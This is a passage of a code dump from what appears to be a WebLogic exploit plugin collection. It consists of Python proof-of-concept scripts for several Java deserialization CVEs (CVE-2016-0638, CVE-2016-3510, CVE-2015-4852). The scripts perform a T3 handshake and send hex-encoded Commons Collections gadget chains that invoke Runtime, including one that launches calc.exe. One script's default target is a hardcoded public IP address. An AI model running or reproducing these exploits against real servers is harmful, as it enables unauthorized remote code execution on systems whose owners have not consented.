server_addr = (rip, rport) 62 | t3handshake(sock, server_addr) 63 | buildT3RequestObject(sock, rport) 64 | rs = sendEvilObjData(sock, PAYLOAD[index]) 65 | checkVul(rs, server_addr, index) 66 | except Exception: 67 | print("CVE_2017_3246脚本出错") 68 | 69 | if __name__=="__main__": 70 | rip = '127.0.0.1' 71 | rport = 7001 72 | run(rip,rport,0) -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2016_0638.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | 15 | VUL=['CVE-2016-0638'] 16 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 17 | VER_SIG=['weblogic.jms.common.StreamMessageImpl'] 18 | def t3handshake(sock,server_addr): 19 | sock.connect(server_addr) 20 | sock.settimeout(7) 21 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 22 | time.sleep(1) 23 | sock.recv(1024) 24 | # print 'handshake successful' 25 | def buildT3RequestObject(sock,rport): 26 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 27 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 28 | data3 = '1a7727000d3234322e323134' 29 | data4 = '2e312e32353461863d1d0000000078' 30 | for d in [data1,data2,data3,data4]: 31 | sock.send(d.decode('hex')) 32 | time.sleep(2) 33 | # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 34 | def sendEvilObjData(sock,data): 35 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 36 | payload+=data 37 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 38 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 39 | sock.send(payload.decode('hex')) 40 | res = '' 41 | try: 42 | while True: 43 | res += sock.recv(4096) 44 | time.sleep(0.1) 45 | except Exception as e: 46 | pass 47 | return res 48 | def checkVul(res,server_addr,index): 49 | p=re.findall(VER_SIG[index], res, re.S) 50 | if len(p)>0: 51 | # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 52 | print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) 53 | else: 54 | # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 55 | print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) 56 | def run(rip,rport,index): 57 | try: 58 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 59 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 60 | sock.settimeout(10) 61 | server_addr = (rip, rport) 62 | t3handshake(sock, server_addr) 63 | buildT3RequestObject(sock, rport) 64 | rs = sendEvilObjData(sock, PAYLOAD[index]) 65 | checkVul(rs, server_addr, index) 66 | except Exception as e: 67 | print("CVE_2016_0638脚本出错") 68 | 69 | if __name__=="__main__": 70 | rip = '222.85.76.240' 71 | rport = 80 72 | run(rip,rport,0) -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2016_3510.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | 15 | VUL=['CVE-2016-3510'] 16 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 17 | VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] 18 | def t3handshake(sock,server_addr): 19 | sock.connect(server_addr) 20 | sock.settimeout(7) 21 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 22 | time.sleep(1) 23 | sock.recv(1024) 24 | # print 'handshake successful' 25 | def buildT3RequestObject(sock,rport): 26 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 27 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 28 | data3 = '1a7727000d3234322e323134' 29 | data4 = '2e312e32353461863d1d0000000078' 30 | for d in [data1,data2,data3,data4]: 31 | sock.send(d.decode('hex')) 32 | time.sleep(2) 33 | # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 34 | def sendEvilObjData(sock,data): 35 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 36 | payload+=data 37 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 38 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 39 | sock.send(payload.decode('hex')) 40 | res = '' 41 | try: 42 | while True: 43 | res += sock.recv(4096) 44 | time.sleep(0.1) 45 | except Exception as e: 46 | pass 47 | return res 48 | def checkVul(res,server_addr,index): 49 | p=re.findall(VER_SIG[index], res, re.S) 50 | if len(p)>0: 51 | # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 52 | print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) 53 | else: 54 | # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 55 | print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) 56 | def run(rip,rport,index): 57 | try: 58 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 59 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 60 | sock.settimeout(10) 61 | server_addr = (rip, rport) 62 | t3handshake(sock, server_addr) 63 | buildT3RequestObject(sock, rport) 64 | rs = sendEvilObjData(sock, PAYLOAD[index]) 65 | checkVul(rs, server_addr, index) 66 | except Exception: 67 | print("CVE_2016_3510脚本出错") 68 | 69 | if __name__=="__main__": 70 | rip = '127.0.0.1' 71 | rport = 7001 72 | run(rip,rport,0) -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2015_4852.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import struct 13 | from binascii import unhexlify 14 | 15 | def run(rip,rport): 16 | try: 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(7) 19 | server_address = (rip, rport) 20 | sock.connect(server_address) 21 | 22 | headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' 23 | sock.sendall(headers) 24 | 25 | data = sock.recv(1024) 26 | 27 | chunk1 = '\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 28 | 29 | chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x